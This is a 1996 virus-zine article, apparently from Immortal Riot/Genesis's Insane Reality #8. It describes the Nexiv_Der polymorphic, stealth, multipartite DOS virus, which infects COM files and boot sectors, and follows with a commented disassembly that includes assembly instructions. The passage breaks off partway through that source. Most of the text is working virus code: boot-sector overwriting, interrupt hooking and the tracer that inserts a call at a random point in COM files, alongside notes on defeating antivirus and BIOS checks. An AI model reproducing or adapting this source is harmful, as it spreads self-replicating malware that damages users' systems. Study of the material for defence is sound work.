Insane Reality issue #8 - (c)opyright 1996 Immortal Riot/Genesis - REALITY.020 Article: Nexiv_Der special Author: Dandler % Nexiv_Der virus special by Dandler % ______________________________________ Here's a Virus Spotlite style article from our Pandanian friend, Dandler. What follows is a technical description of the Nexiv_Der virus, followed by a very detailed and complete disassembly. Nexiv_Der is quite an interesting virus - read on. Debug Script follows. - _Sepultura_ ;=[BEGIN NEXIVDER.TXT]======================================================= ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ NEXIV_DER Virus Description ÛÛ ÛÛ ÛÛ ÛÛ Written by Dandler ÛÛ ÛÛ Translated by b0z0 ÛÛ ÛÛ Created from 28-Sep-96 to 10-Oct-96 ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ General description of the Nexiv_Der: ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß The Nexiv_Der virus (which reversed name results Red_Vixen) is a TSR, polymorphic, COM+Floppy_Boot+Hard_Disk_Boot-infector, stealth. The main characteristic of this virus is certainly the possibility to infect a COM file without changing in any way the entry point. Infact the file infection is done using a complex procedure, that i'll explain later, which insert a call to the virus in a random position of the file. This capability, added to the polymorphism of the virus, makes the search for it very hard, and for some less sophisticate antiviruses even impossible. Unfortunately the mutation engine isn't perfect, contrary frequently it generate code that causes the pc to crash during a file infection. How it works: ßßßßßßßßßßßßß When the virus is executed it will check if it started from a file or from a Boot Sector. If the virus isn't already active in memory it will try to infect the Boot Sector of the drive C, located at the Cylinder 0 / Side 1 / Sector 1. After this operation, if the execution has been done from a file, the virus will continue the execution of the host without doing anything else. Otherwise, if the execution has been done from the Boot, the virus will install itself in memory. The memory installation is done with a normal hook of the Int 13h vector, the needed memory is allocated decrementing the word at 40h:13h, that contains the avaiable memory dimension in K (usually 640). The routine of the Int 13h handler doesn't only hide the virus presence and infect the Floppy Boot, but it is also used to hook the Int 21h once that DOS has been totally loaded. In detail, the routine waits for 3 sectors which contain as the first two bytes 'MZ' are read. It is presumable that after the execution of 3 EXE the DOS is now already installed in memory. The Int 21h handler will handle the file infection, of course. File infection: ßßßßßßßßßßßßßßß The infection routine is executed when a COM file is executed and is at least 1000 but not more than 55000 bytes long. Each file can be infected up to 3 times. This is done to avoid that the virus will infect a file location that isn't executed frequently. The number of file infections is stored as the number of the seconds of the file: 5 = one infection, 6 = two infections, 7 = three infections, all the other values = no infections done. After this controls the virus passes to the real infection. Once that the file is opened it reads the first 32 byte, and hooks the Int 13h, the Int 3 and leaves DOS to execute the file normally. To execute the file DOS must read it from the disk where the file is located, using therefore the Int 13h. And that is why the virus hooked the Int 13h! That's because the routine can check when the first sector of the file is being readed, operation that is done by comparing the first 32 byte with the 32 read precedently. When the first sector of the file is determinated, the first byte in the memory image is substituted with a 0CCh, which is just an Int 3. After this the Int 13h handler is disabled, so there wouldn't be any possibility that another Int 3 may be inserted. When the DOS has finished to read the entire file it executes the file, calling in this way the Int 3. The virus by intercepting the Int 3 understands that the execution of the file has started and so it restores the first byte of the file in the memory and then it activate the virus tracer hooking it at the Int 1. Now the file is executed step-by-step. The virus also fills the part of memory just under the end of the file in memory with a standard byte, which use will be explained later. The step-by-step execution is a method to make the microprocessor execute an Int 1 after each instruction. But i won't talk too much about this. Maybe another day :) The tracer hooked to the Int 1 waits that a random number between 256 and 1279 instructions of the file has been executed. Once that the selected number of instructions has been executed, the tracer will continue in the same way to execute the step-by-step mode, but it will search for an instruction that is a CALL (0E8h,x,x), or a JMP (0E9h,x,x) or also a ADD/SUB/CMP/XOR of a byte with a byte register, like for example the instruction 'CMP CL,12h' (80h,0Cxh,x). Note that all of this instructions are long exactly 3 byte, infact the call to the virus that will be insterted is a CALL, which is long 3 byte. Notice also that it isn't rare that are produced multiple infections which are fully functional where the selected instruction is an instruction of the polymorphic code of another precedent infection. Selected a suitable instruction, the virus will search for a memory part after the tail of the file that hasn't been modified by the host. This check is done by searching a part of memory where a sufficent number of contiguous standard bytes where left untouched. Here will be inserted the body of the virus. When the needed memory is found the virus is finally ready to start the real file infection. There is also a last check: it verifyes if effectively the selected instruction is still at the selected position in the file. If the file is compressed with PKLite, LZExe or Diet, or the file is encrypted then the virus won't infect the file to prevent the damage of the file. At this point the virus unhooks the tracer from the Int 1, infects the file and leaves the program to continue its work. When the program terminates his execution the virus will unhook again the tracer from Int 1, Int 3 and Int 13h. This is done to prevent some vectors to remain still hooked after the termination of the file execution. This may succed when the file isn't read using the Int 13h or when the tracer is brutally disabled during the host execution. Highlights of this method of COM infection: ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß - For an antivirus the check for an infection is really hard. - The virus may be also activated just in some cases when a determinate part of code is executed. Example: during my study of this virus an infection of the DOS program DISKCOPY.COM i noticed that when i started the program normally the virus doesn't activate, but it get activated just when i tried to copy a diskette (DISKCOPY A: A:) - The entry point of the host is unchanged, so the check of some intergity verifyers and antiviruses is useless. Defects of this method of COM infection: ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß - Not all the COM files can be infected, the compressed and encrypted ones infact can't. - The plain and uncompressed files that contains antidebugging code may cause a crash of the PC during its infection. This because the virus tracing uses the Int 1 and the file may change the Int 1 vector one word at once (mov [4],1234h) - Only files that are on floppy disks and hard disk may be infected. To be more precise only files that are accessed using Int 13h can be infected. On remote or virtual disks the infection can't happen. Hard Disk's Boot Sector infection: ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß The infection of the Hard Disk is done in a more complex way than many other multipartite viruses. This is due to the fact that the virus is polymorphic also on the boot sector. The virus reads the Boot Sector of the first partition of the first Hard Disk that is located on Cylinder 0 / Side 1 / Sector 1 and checks if this has been already infected. This is done by checking if the second byte of the sector is equal to 'E'. If it isn't already infected the Boot is partially overwritten by a polymorphic loader, which will load and execute the body of the virus at the Boot from the Hard Disk. The original boot is saved at the location Cylinder 0 / Side 0 / Sector 6 and just after this, at the location Cylinder 0 / Side 0 / Sector 7, the polymorphic body of the virus will be saved. Highlights of this method of Hard Disk's Boot Sector infection: ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß - The infection procedure doesn't apply any change to the MBR, so it won't worry any antivirus protections of the AMI and Award BIOSes. Defects of this method of Hard Disks's Boot Sector infection: ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß - None Floppy Boot Sector infection: ßßßßßßßßßßßßßßßßßßßßßßßßßßßßß The infection of the Boot Sector of the Floppy is easyer than the Hard Disk one. When the DOS will try to read the Floppy Boot Sector the virus will check if it has been already infected. This is done by checking if the second byte of the sector is equal to 'E' If it isn't, the Boot is infected by overwriting the first part of it with a polymorphic loader which will load and execute the virus body at a Boot from the Floppy. The original Boot Sector is stored at the location Cylinder 79 / Side 1 / Sector 1 and just after this, at the position Cylinder 79 / Side 1 / Sector 2, the virus body will be saved. Notice that the polymorphic body of the virus isn't created at virus runtime but is just copied from the Hard Disk infection. Highlights of this method of Floppy's Boot Sector infection: ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß - None Defects of this method of Floppy's Boot Sector infection: ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß - The virus is quite long and risks to be overwritten on the Floppy disks that will be quite completely filled (for example with a backup or with an ARJ or ZIP in backup mode) - Only 1.44M Floppyes are infected [EOF] ;=[END NEXIVDER.TXT]========================================================= ;=[BEGIN NEXIVDER.ASM]======================================================= ;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ;ÛÛ ÛÛ ;ÛÛ NEXIV_DER Virus Source ÛÛ ;ÛÛ ÛÛ ;ÛÛ Disassembled by Dandler ÛÛ ;ÛÛ Translated by b0z0 ÛÛ ;ÛÛ Created from 14-Sep-96 to 28-Sep-96 ÛÛ ;ÛÛ ÛÛ ;ÛÛ To assemble Nexiv_Der virus: ÛÛ ;ÛÛ - TASM /m2 nexivder.asm ÛÛ ;ÛÛ - TLINK /T nexivder.obj ÛÛ ;ÛÛ ÛÛ ;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; The file is a COM seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Equs magic_char equ 'N' ; 'N' as 'Nexiv_der' ; Used for ; the r_u_there_call and ; for other checks pos_polyloader equ 50h ; Position of the poly ; loader in the infected ; boot ; Must be a multiple of 16 ; and must not be smaller ; than 50h pos_loader equ pos_polyloader - ([loader3] - [loader2]) ; Position of the loader ; in infected boot boot_marker equ 0AA55h ; Boot marker ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Just some other directives before the start... nexivder proc near start: ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Virus start virus_start label checksum_start label push cs call push_ip ret push_ip: pushf ; Save host flags push ax push bx push cx push dx push si push di push bp push ds push es ; Save host registers sti ; Activate interrupts cld ; Set direction of the ; REPs to +1 call delta_ip delta_ip: pop ax sub ax,offset delta_ip ; Get the delta offset of ; the IP mov cl,4 shr ax,cl ; Divide it by 16 mov bx,cs add ax,bx ; And add CS to it push ax mov ax,offset change_cs push ax retf ; Change the segment, so ; there wouldn't be any ; offset change_cs: push cs pop ds cmp sp,7C00h - (2 + 2) - (2 * 10) ; Has the virus started ; from the boot? je starting_from_mbr cmp ds:first_gen,1 ; Is the virus a 1st gen? je loc1_im_a_first_gen mov bp,sp sub word ptr [bp + (2 + 2) + (2 * 10)],3 ; Decrement the IP by 3 to ; execute also the ; instruction overwritten ; by the jump to the virus mov di,[bp + (2 + 2) + (2 * 10)] mov es,[bp + (2) + (2 * 10)] ; ES:DI = position of the ; jump to the virus mov si,offset host_bytes movsb movsw ; Reput the orig. 3 bytes ; of the host overwritten ; with the jump to the ; virus loc1_im_a_first_gen: push cs pop es cmp ds:first_gen,1 ; Is the virus a 1st gen? je loc2_im_a_first_gen call checksum ; Calculate the checksum cmp ds:virus_checksum,bx ; Compare it with the ; precedently saved one jne virus_trashed ; The virus has been ; damaged, so just ; execute the host loc2_im_a_first_gen: mov ds:first_gen,0 ; Reset the first_gen ; field mov ax,3000h + magic_char int 21h ; R u there call cmp ah,30h ; The virus is already je virus_already_in_memory ; in mem? call infect_hdd_from_file ; Try to infect the ; boot of the hard disk virus_already_in_memory: virus_trashed: pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax ; Restore the registers ; of the host popf ; Restore the flag of ; the host retf ; Continue the execution ; of the host starting_from_mbr: cli mov sp,7C00h ; Reset the stack sti xor ax,ax mov ds,ax mov es,ax mov si,7C00h + 200h ; At 7E00 there is the ; original boot that has ; been alreay read from ; the loader mov di,7C00h mov cx,200h rep movsb ; Move the original MBR ; at 0000:7C00 mov ax,ds:[13h*4] mov cs:ip13,ax mov ax,ds:[13h*4 + 2] mov cs:cs13,ax ; Save the Int 13h ; vector mov cs:mz_counter,3 ; Inicialize the EXE file ; counter mov ax,ds:[413h] ; AX = total mem in K sub ax,(offset virus_mem_end-offset virus_start+3FFh)/400h mov ds:[413h],ax ; Allocate the needed mem mov cl,6 shl ax,cl sub ax,10h mov es,ax ; ES = segment of the ; reserved memory push cs pop ds mov si,offset virus_start mov di,offset virus_start mov cx,offset virus_mem_end - offset virus_start rep movsb ; Copy the virus in the ; reserved memory xor ax,ax mov ds,ax ; Point DS to the IVT mov word ptr ds:[13h*4],offset int_13_entry mov ds:[13h*4 + 2],es ; Hook the Int 13 call infect_hdd_from_boot ; Try to infect the hard ; disk boot xor ax,ax mov ds,ax mov es,ax ; Set to 0 the segment ; registers db 0EAh dw 7C00h, 0 ; Exec the original boot ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Calculate the virus checksum in BX checksum: mov si,offset virus_start mov cx,offset checksum_end - offset checksum_start xor bx,bx mov ah,0 loop1_checksum: lodsb add bx,ax loop loop1_checksum ret ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Infect, if it hasn't been already, the hard disk boot infect_hdd_from_file: mov ah,62h int 21h ; Ask the segment of the ; current PSP dec bx mov ds,bx mov ax,ds:[10h + 2] ; AX = total mem/16 sub ax,(offset virus_disc_end-offset virus_start+0A00h)/10h+1 mov es,ax ; ES = free mem segment push cs pop ds mov ax,201h ; Read a sector xor bx,bx mov cx,1 ; Cylinder 0 / Sector 1 mov dx,180h ; Side 1 / Drive 80h call int13_retry ; Read the boot of the ; hard disk nowarn cmp byte ptr es:[bx + 1],pos_loader - 2 ; Is the boot already ; infected? warn jne boot_hdd_not_already_infected_from_file jmp boot_hdd_already_infected_from_file boot_hdd_not_already_infected_from_file: mov ax,301h ; Write a sector xor bx,bx mov cx,6 ; Cylinder 0 / Sector 6 mov dx,80h ; Side 0 / Drive 80h call int13_retry ; Save the original boot mov si,offset loader xor di,di mov cx,offset loader2 - offset loader1 rep movsb nowarn mov di,pos_loader warn mov cx,offset loader3 - offset loader2 rep movsb ; Overwrite the boot code ; with the first part of ; the loader code push es mov ax,es add ax,pos_polyloader/10h mov es,ax loop1_create_poly_loader: mov ah,1 ; Generate loader code mov al,0Fh ; High Polymorphism mov cx,offset loader4 - offset loader3 mov dx,offset loader3 call poly ; Call the poly engine push cs pop ds cmp cx,200h - (pos_loader + (offset loader3 - offset loader2) + 2) ja loop1_create_poly_loader pop es mov word ptr es:[200h - 2],boot_marker ; Add the boot signature mov ax,301h ; Write a sector xor bx,bx mov cx,1 ; Cylinder 0 / Sector 1 mov dx,180h ; Side 1 / Drive 80h call int13_retry ; Write the infected boot loop1_create_poly_boot: mov ah,3 ; Generate boot code mov al,0Fh ; High Polymorphism mov cx,offset virus_disc_end - offset virus_start mov dx,offset virus_start call poly ; Call the poly engine push cs pop ds cmp cx,(offset virus_disc_end-offset virus_start)+0A00h ja loop1_create_poly_boot mov ax,300h+(offset virus_disc_end-offset virus_start+0A00h+1FFh)/200h ; Write sectors xor bx,bx mov cx,7 ; Cylinder 0 / Sector 7 mov dx,80h ; Side 0 / Drive 80h call int13_retry ; Write the body of the ; virus boot_hdd_already_infected_from_file: push cs pop es ret ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Infect, if it hasn't been already, the hard disk boot infect_hdd_from_boot: mov ax,ds:[413h] ; AX = total mem in K sub ax,(offset virus_disc_end-offset virus_start+0A00h+3FFh)/400h mov cl,6 shl ax,cl mov es,ax ; ES = free mem segment push cs pop ds mov ax,201h ; Read a sector xor bx,bx mov cx,1 ; Cylinder 0 / Sector 1 mov dx,180h ; Side 1 / Drive 80h call int13_retry ; Read the hard disk boot nowarn cmp byte ptr es:[bx + 1],pos_loader - 2 ; Is the boot already ; infected nowarn jne boot_hdd_not_already_infected_from_boot jmp boot_hdd_already_infected_from_boot boot_hdd_not_already_infected_from_boot: mov ax,301h ; Write a sector xor bx,bx mov cx,6 ; Cylinder 0 / Sector 6 mov dx,80h ; Side 0 / Drive 80h call int13_retry ; Save the original boot mov si,offset loader xor di,di mov cx,offset loader2 - offset loader1 rep movsb nowarn mov di,pos_loader warn mov cx,offset loader3 - offset loader2 rep movsb ; Overwrite the boot code ; with the first part of ; the loader code push es mov ax,es add ax,pos_polyloader/10h mov es,ax loop2_create_poly_loader: mov ah,1 ; Generate loader code mov al,0Fh ; High Polymorphism mov cx,offset loader4 - offset loader3 mov dx,offset loader3 call poly ; Call the poly engine push cs pop ds cmp cx,200h-(pos_loader+(offset loader3-offset loader2)+2) ja loop2_create_poly_loader pop es mov word ptr es:[200h - 2],boot_marker ; Add the boot signature mov ax,301h ; Write a sector xor bx,bx mov cx,1 ; Cylinder 0 / Sector 1 mov dx,180h ; Side 1 / Drive 80h call int13_retry ; Write the infected boot loop2_create_poly_boot: mov ah,3 ; Generate boot code mov al,0Fh ; High polymorphism mov cx,offset virus_disc_end - offset virus_start mov dx,offset virus_start call poly ; Call the poly engine push cs pop ds cmp cx,(offset virus_disc_end-offset virus_start)+0A00h ja loop2_create_poly_boot mov ax,300h+(offset virus_disc_end-offset virus_start+0A00h+1FFh)/200h ; Write sectors xor bx,bx mov cx,7 ; Cylinder 0 / Sector 7 mov dx,80h ; Side 0 / Drive 80h call int13_retry ; Write the virus body boot_hdd_already_infected_from_boot: push cs pop es ret ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Int 13h Handler int_13_entry: cmp cs:mz_counter,0 ; Mz_counter is 0? jne loc1_int_13_entry cmp ax,201h jne loc1_int_13_entry cmp cx,1 jne loc1_int_13_entry cmp dx,180h ; Read of the hard disk ; boot requested? jne loc1_int_13_entry push cx push dx mov cx,6 mov dh,0 call int13_orig_retry ; Read the original boot ; saved at 0/0/6 pop dx pop cx retf 2 ; Return to DOS loc1_int_13_entry: cmp ah,2 jne loc3_int_13_entry cmp cs:mz_counter,0 ; Mz_counter is 0? je loc3_int_13_entry pushf call dword ptr cs:ip13 ; Do the requested read pushf cmp word ptr es:[bx],'ZM' ; Is the system reading ; an .EXE? jne loc2_int_13_entry dec cs:mz_counter ; Decrement of 1 ; mz_counter cmp byte ptr cs:mz_counter,0 ; Is mz_counter 0? jne loc2_int_13_entry mov cs:file_buffer,0 ; Reset the field ; file_buffer push ax push ds xor ax,ax mov ds,ax ; Point DS to the IVT mov ax,ds:[21h*4] mov cs:ip21,ax mov ax,ds:[21h*4 + 2] mov cs:cs21,ax ; Save the Int 21h vector mov word ptr ds:[21h*4],offset int_21_entry mov ds:[21h*4 + 2],cs ; Hook the Int 21h pop ds pop ax loc2_int_13_entry: popf retf 2 ; Return to DOS loc3_int_13_entry: cmp ax,201h jne int_13 cmp cx,1 jne int_13 cmp dh,0 jne int_13 cmp dl,1 ; Read of the floppy boot ; requested? jbe check_floppy_boot int_13: db 0EAh ip13 dw ? cs13 dw ? ; Jump to the original ; Int 13h check_floppy_boot: pushf call dword ptr cs:ip13 ; Read the boot as ; requested pushf ; Save flags push ax push bx push cx push dx push si push di push bp push ds push es ; Save registers jnc loc1_check_floppy_boot ; An error at boot read ; occoured? preexit_check_floppy_boot: jmp exit_check_floppy_boot loc1_check_floppy_boot: sti cld push cs pop ds nowarn cmp byte ptr es:[bx + 1],pos_loader - 2 ; Is the floppy already ; infected? warn je preexit_check_floppy_boot cmp word ptr es:[bx + 13h],2880 ; Is the floppy a 1.44? jne preexit_check_floppy_boot push es pop ds mov ax,cs add ax,10h add ax,(offset virus_disc_end-offset virus_start)/10h+1 mov es,ax mov si,bx xor di,di mov cx,200h rep movsb ; Copy the boot in the ; buffer push cs pop ds mov ax,301h ; Write a sector xor bx,bx mov cx,4F01h ; Cylinder 79 / Sector 1 mov dh,1 ; Side 1 call int13_orig_retry ; Save the original boot jc exit_check_floppy_boot mov si,offset loader xor di,di mov cx,offset loader2 - offset loader1 rep movsb nowarn mov di,pos_loader warn mov cx,offset loader3 - offset loader2 rep movsb ; Overwrite the boot code ; with the first part of ; the loader code mov ax,es add ax,pos_polyloader/10h mov es,ax push dx loop3_create_poly_boot: mov ah,1 ; Generate loader code mov al,0Fh ; High Polymorphism mov cx,offset loader4 - offset loader3 mov dx,offset loader3 call poly ; Call the poly engine push cs pop ds cmp cx,200h-(pos_loader+(offset loader3-offset loader2)+2) ja loop3_create_poly_boot mov word ptr es:[512-(pos_loader+(offset loader3-offset loader2)+2)],0AA55h ; Warning! This is a bug ; of the virus! ; mov word ptr es:[200h - 2],boot_marker ; This would be the right ; instruction pop dx mov ax,es sub ax,pos_polyloader/10h mov es,ax mov ax,301h ; Write a sector xor bx,bx mov cx,1 ; Cylinder 0 / Sector 1 mov dh,0 ; Side 0 call int13_orig_retry ; Overwrite the boot with ; the infected one jc exit_check_floppy_boot xor bp,bp loop1_move_virus_code: push dx mov ax,201h ; Read a sector xor bx,bx mov cx,7 ; Cylinder 0 add cx,bp ; Sector 7 + BP mov dx,80h ; Side 0 / Drive 80h call int13_orig_retry ; Read virus sectors from ; hard disk pop dx mov ax,301h ; Write a sector xor bx,bx mov cx,4F02h ; Cylinder 79 add cx,bp ; Sector 2 + BP mov dh,1 ; Side 0 call int13_orig_retry ; Write virus sectors on ; the floppy inc bp cmp bp,(offset virus_disc_end-offset virus_start+0A00h+1FFh)/200h jne loop1_move_virus_code exit_check_floppy_boot: pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax ; Restore registers popf ; Restore flags retf 2 ; Return to DOS ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Int 21h Handler int_21_entry: cmp ax,3000h + magic_char ; Has been called the ; r_u_there_call? je r_u_there_call cmp ax,4B00h ; A file being executed? je check_file db 0EAh ip21 dw ? cs21 dw ? ; Jump to the original ; Int 21h r_u_there_call: iret ; Do nothing check_file: push ax push bx push cx push dx push si push di push bp push ds push es ; Save registers sti cld push cs pop es mov si,dx mov di,offset file_name mov cx,64 rep movsb ; Copy the filename push cs pop ds mov ax,3D00h mov dx,offset file_name int 21h ; Open the file to infect ; in ReadOnly jnc loc1_check_file jmp exit_check_file loc1_check_file: mov bx,ax ; BX = file handle mov ah,3Fh mov cx,32 mov dx,offset file_buffer int 21h ; Read the first 32 bytes ; of the file cmp ax,32 ; The file is long at ; least 32 bytes? jne dont_infect_file cmp word ptr ds:file_buffer,'MZ' ; Is the file an EXE? je dont_infect_file cmp word ptr ds:file_buffer,'ZM' ; Is the file an EXE? je dont_infect_file mov ax,5700h int 21h ; Ask the filedate and cx,1Fh cmp cx,7 ; The seconds of the file ; are 7? je dont_infect_file mov ax,4202h xor cx,cx xor dx,dx int 21h ; Point at the end of the ; file cmp dx,0 ; File is >= 65536 bytes? jne dont_infect_file cmp ax,1000 ; File is < 1000 bytes? jb dont_infect_file cmp ax,55000 ; File is > 55000 bytes? ja dont_infect_file mov ds:file_length,ax ; Save the file lenght mov ax,3503h int 21h ; Get Int 3 vector mov ds:ip03,bx mov ds:cs03,es ; Save the vector mov ax,3513h int 21h ; Get Int 13h vector mov ds:temp_ip13,bx mov ds:temp_cs13,es ; Save the vector push cs pop es mov ax,2503h mov dx,offset int_3_entry int 21h ; Hook Int 3 mov ax,2513h mov dx,offset temp_int_13_entry int 21h ; Hook Int 13h jmp close_file dont_infect_file: mov ds:file_buffer,0 ; Reset the field ; file_buffer close_file: mov ah,3Eh int 21h ; Close the file mov ah,0Dh int 21h ; Reset the buffer exit_check_file: pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax ; Restore registers pushf call dword ptr cs:ip21 ; Execute the file mov cs:file_buffer,0 ; Reset the field ; file_buffer pushf push ax push dx push ds mov ax,2501h mov dx,cs:ip01 mov ds,cs:cs01 int 21h ; Restore Int 1 vector mov ax,2503h mov dx,cs:ip03 mov ds,cs:cs03 int 21h ; Restore Int 3 vector mov ax,2513h mov dx,cs:temp_ip13 mov ds,cs:temp_cs13 int 21h ; Restore Int 13h vector pop ds pop dx pop ax popf retf 2 ; Return to DOS ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Gestore dell'Int 3 int_3_entry: pushf ; Save flags push ax push bx push cx push dx push si push di push bp push ds push es ; Save registers sti cld push cs pop ds mov si,offset file_buffer mov di,offset virus_start mov cx,32 rep movsb ; Delete the Int 3 at ; the start of the host mov byte ptr file_buffer,0 ; Reset the field ; file_buffer mov ah,0Dh int 21h ; Reset the buffers mov di,offset virus_start add di,ds:file_length mov al,magic_char mov cx,(offset virus_disc_end - offset virus_start)*3 rep stosb mov ds:host_segment,es ; Fill the tail of the file ; with the magic_char to ; find the memory zones ; that the host doesn't ; overwrite mov ax,3501h int 21h ; Get Int 1 vector mov ds:ip01,bx mov ds:cs01,es ; Save the vector mov ax,2501h mov dx,offset int_1_entry int 21h ; Hook Int 1 mov ax,2503h mov dx,ds:ip03 mov ds,ds:cs03 int 21h ; Restore Int 3 mov ax,2513h mov dx,cs:temp_ip13 mov ds,cs:temp_cs13 int 21h ; Restore Int 13h push cs pop ds in al,40h ; AL = random and al,3 mov ah,al in al,40h ; AL = random add ax,100h ; 256 < AX < 1279 mov ds:inst_counter,ax ; Set with AX the number ; of instructions that ; will be executed before ; inserting the virus pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax ; Restore the registers popf ; Restore the flags push bp mov bp,sp dec word ptr [bp + 2] ; Decrement the IP by 1 ; to execute the host from ; start but without the ; Int 3 or word ptr [bp + 6],100h ; Trace = ON pop bp iret ; Execute the host with ; activated trace ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Secondary Int 13h handler temp_int_13_entry: cmp cs:file_buffer,0 ; The control has been ; already disabled? je temp_int_13 cmp ah,2 ; Read requested? jne temp_int_13 pushf call dword ptr cs:temp_ip13 ; Execute the read jc error_reading_temp_int13 pushf push cx push si push di push ds push cs pop ds mov si,offset file_buffer mov di,bx mov cx,32 repe cmpsb ; Compare the first 32 ; bytes of the readed ; sector with those readed ; from the file jnz dont_insert_int3 mov byte ptr es:[bx],0CCh ; Insert an Int 3 at the ; sector start dont_insert_int3: pop ds pop di pop si pop cx popf error_reading_temp_int13: retf 2 ; Return to DOS temp_int_13: db 0EAh temp_ip13 dw ? temp_cs13 dw ? ; Jump to the original ; Int 13 ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Int 1 Handler int_1_entry: push bp mov bp,sp push ax mov ax,[bp + 4] cmp cs:host_segment,ax ; Check if the host code ; is traced pop ax jnz exit_int_1_entry cmp cs:inst_counter,0 ; The instruction counter ; is 0? je time_to_infect dec cs:inst_counter ; Decrement the ; instruction counter exit_int_1_entry: pop bp iret ; Execute another ; instuction time_to_infect: sti cld push ax push si push ds lds si,dword ptr [bp + 2] ; DS:SI = CS:IP of the host mov al,[si] ; AL = instruction at DS:SI cmp al,0E8h ; Is a CALL? je istr_ok cmp al,0E9h ; Is a JMP? je istr_ok cmp al,80h jne istr_not_ok mov al,[si + 1] and al,0C0h cmp al,0C0h ; Is a ADD/SUB/XOR? je istr_ok istr_not_ok: pop ds pop si pop ax jmp exit_int_1_entry ; It isn't a 3 byte ; instruction, trace again ; the host istr_ok: mov cs:call_position,si sub cs:call_position,offset virus_start ; Save the position where ; will be inserted the ; jump to the virus push di push es push cs pop es mov di,offset host_bytes movsb movsw ; Save the 3 bytes that ; will be overwritten by ; the virus jump pop es pop di pop ds pop si pop ax push ax push bx push cx push dx push si push di push bp push ds push es ; Save registers mov ds,cs:host_segment mov si,cs:file_length add si,offset virus_start ;DS:SI = tail of the host mov cx,(offset virus_disc_end - offset virus_start)*3 xor bx,bx loop1_look_4_space: lodsb cmp al,magic_char jne loc1_look_4_space inc bx jmp loc2_look_4_space loc1_look_4_space: xor bx,bx loc2_look_4_space: cmp bx,32+(offset virus_disc_end-offset virus_start)+32 je space_found loop loop1_look_4_space ; Search enought mem space ; that wouldn't be modified ; by the host exit_trace: pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax ; Restore registers push ax push dx push ds mov ax,2501h mov dx,cs:ip01 mov ds,cs:cs01 int 21h ; Restore Int 1 vector pop ds pop dx pop ax and word ptr [bp + 6],0FEFFh; TRACER = OFF jmp exit_int_1_entry ; Leave the host running ; without tracer enabled space_found: sub si,offset virus_disc_end - offset virus_start + 20h and si,0FFF0h sub si,offset virus_start mov cs:virus_position,si ; Save the position where ; put the virus mov ax,3524h int 21h ; Get Int 24h handler mov cs:ip24,bx mov cs:cs24,es ; Save the vector push cs pop ds push cs pop es mov ax,2524h mov dx,offset int_24_entry int 21h ; Hook Int 24h mov ax,4300h mov dx,offset file_name int 21h ; Get file attributes mov 